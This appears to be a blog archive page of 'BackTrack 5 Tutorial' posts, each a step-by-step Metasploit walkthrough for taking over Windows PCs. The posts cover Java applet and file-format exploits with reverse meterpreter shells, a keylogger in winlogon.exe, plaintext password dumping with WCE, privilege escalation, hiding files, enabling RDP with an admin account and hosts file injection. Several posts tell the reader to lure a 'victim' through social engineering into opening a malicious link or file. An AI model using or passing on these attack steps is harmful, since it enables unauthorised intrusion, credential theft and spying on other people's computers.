Showing posts with label BackTrack 5 Tutorial. Show all posts
Showing posts with label BackTrack 5 Tutorial. Show all posts

How to get the Admin Access of Remote PC using Windows Kernel Intel x64 SYSRET Vulnerability Exploit

The shellcode disables kernel Code Signing and will grant NT SYSTEM privilege to specified Application or already running process (PID). Exploit successfully tested on Windows 7 SP0/1 (x64) and Windows 2008 R2 SP1 (x64).

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Download the sysret from here and unzip file in your desktop

Once you got the meterpreter session use ‘upload ‘command to upload the sysret.exe and MinHook.x64 in victim pc using

Upload /root/desktop/sysret/x64/Release/sysret.exe .
Upload /root/desktop/sysret/x64/Release/MinHook.x64.dll .



Now session use ‘ps‘command to displays a list of running processes on the target and find the PID number of Explorer.exe


The next step is we need to attach Meterpreter to the explorer.exe process. Victim explorer.exe process ID is 1588. Now type sysret.exe =pid (PID Number)

Hack Remote Windows PC using VMWare OVF Tools Format String Vulnerability

This module exploits format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

Exploit Targets
VMWare OVF Tools 2.1

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/ovftool_format_string
msf exploit (ovftool_format_string)>set payload windows/meterpreter/reverse_tcp
msf exploit (ovftool_format_string)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (ovftool_format_string)>set srvhost 192.168.1.6 (This must be an address on the local machine)
msf exploit (ovftool_format_string)>set uripath / (The Url to use for this exploit)
msf exploit (ovftool_format_string)>exploit  


Now an URL you should give to your victim http://192.168.1.6:8080/ via chat or email or any social engineering technique.



Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

How to Hide File in Remote Victim PC

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.

Type attrib +h +r +s (drive name) d:/Folder Name and press Enter button to activate it.

This will hide your "Video Folder" folder from D drive. No one can unhide this folder using "Show hidden files and folders" option also


 If you want to unhide the folder you may just change the parameters from ‘+’ to ‘-’ :-
attrib example -s –h

For unhide attrib -h -r -s (drive name) d:/Foldername

Hack Remote Windows Password using Keylogger in Meterpreter

Once you got the meterpreter session use ‘ps‘ command to displays a list of running processes on the target



The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger

Keyscan_start – to start the keylogger
Keyscan_dump – to print captured keystrokes
Keyscan_stop – to stop the keylogger

This will capture the credentials of all users logging into the system as long as this is running.

How to Check Enabled Remote Desktop Service in Network with Metasploit

This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type
use auxiliary/scanner/rdp/ms12-020_check
msf exploit (ms12-020_check)>set rhosts 192.168.1.1/24 (Target Host Range)
msf exploit (ms12-020_check)>set thread 1
msf exploit (ms12-020_check)>exploit 

Hack Remote Windows Passwords in Plain Text with WCE


Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Step 1: Now upload the wce.exe in victim pc using
Upload /pentest/passwords/wce/wce.exe .
Step 2: type shell to get the command prompt of victim pc
Step 3: now use wce.exe –w command to get password in text form

Windows Manage Memory Payload Injection

This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit Targets
Windows PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/local/payload_inject
msf exploit (payload_inject)>set payload windows/meterpreter/reverse_tcp
msf exploit (payload_inject)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (payload_inject)>set session 1
msf exploit (payload_inject)>exploit 


Attacking on Windows, Linux or MAC PC using Java Applet Method Handle Remote Code Execution

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_method_handle
msf exploit (java_jre17_method_handle)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_method_handle)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (java_jre17_method_handle)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (java_jre17_method_handle)>set uripath javaupdate (The Url to use for this exploit)
msf exploit (java_jre17_method_handle)>exploit 


Now an URL you should give to your victim http://192.168.1.3:8080/javaupdate


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 


For More Meterpreter Commands Click Here

Hack Windows, Linux or MAC PC using Java Applet AverageRangeStatisticImpl Remote Code Execution

This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_glassfish_averagerangestatisticimpl
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_glassfish_averagerangestatisticimpl)>exploit 


Now an URL you should give to your victim http://192.168.1.3:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 


For More Meterpreter Commands Click Here

Exploit Windows PC using Freesshd Authentication Bypass

This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Exploit Targets
Freesshd 1.2.6 / Windows

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/ssh/freesshd_authbypass
msf exploit (freesshd_authbypass)>set payload windows/meterpreter/reverse_tcp
msf exploit (freesshd_authbypass set lhost 192.168.1.4 (IP of Local Host)
msf exploit (freesshd_authbypass)>set rhost 192.168.1.6 (IP of Victim PC)
msf exploit (freesshd_authbypass)>exploit 

Hack Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Exploit Targets
Java 7 Update 10
Windows PC
Linux PC
MAC OS X PC

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/browser/java_jre17_jmxbean
msf exploit (java_jre17_jmxbean)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (java_jre17_jmxbean)>set srvhost 192.168.1.5 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean)>exploit 


Now an URL you should give to your victim http://192.168.1.5:8080/


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Hack Windows PC using Orbital Viewer ORB File Parsing Buffer Overflow

This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking are done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.

Exploit Targets
Orbital Viewer 1.04 

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/orbital_viewer_orb
msf exploit (orbital_viewer_orb)>set payload windows/meterpreter/reverse_tcp
msf exploit (orbital_viewer_orb)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (orbital_viewer_orb)>exploit


After we successfully generate the malicious orb File, it will stored on your local computer
/root/.msf4/local/msf.orb


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.orb files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Hack Windows PC using CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

This module exploits a stack buffer overflow in Cyber Link Power2Go version 8.x the vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets
CyberLink Power2Go 8

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/cyberlink_p2g_bof
msf exploit (cyberlink_p2g_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cyberlink_p2g_bof)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (cyberlink_p2g_bof)>exploit


After we successfully generate the malicious p2g File, it will stored on your local computer
/root/.msf4/local/msf.p2g


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.p2g files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Attacking on Windows PC using Real player RealMedia File Handling Buffer Overflow

This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the Get Private Profile String function to retrieve the URL property from an Internet Shortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets
Real Player 15.0.5.109 

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/real_player_url_property_bof

msf exploit (real_player_url_property_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (real_player_url_property_bof)>exploit   


After we successfully generate the malicious rm File, it will stored on your local computer
/root/.msf4/local/msf.rm


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.rm files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


How to Enable Remote Desktop in Victim PC using Metasploit

This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target's port 3389/tcp.

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Step 1:  Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Step 2: Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

Step 3: Open your backtrack terminal and type msfconsole


msf > use post/windows/manage/enable_rdp
msf post(enable_rdp) > set session 2
msf post(enable_rdp) > exploit

Hosts File Injection in Remote Windows 7 PC using Metasploit

This module allows the attacker to insert a new entry into the target system's hosts file.

Exploit Targets
Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Step 1:  Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Step 2: Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

Step 3: Open your backtrack terminal and type msfconsole


msf > use post/windows/manage/injet_host
msf post(injet_host) > set domain www.hackingarticles.in
msf post(injet_host) > set ip 74.125.236.16 (Your Desired IP)
msf post(injet_host) > set session 2
msf post(injet_host) > exploit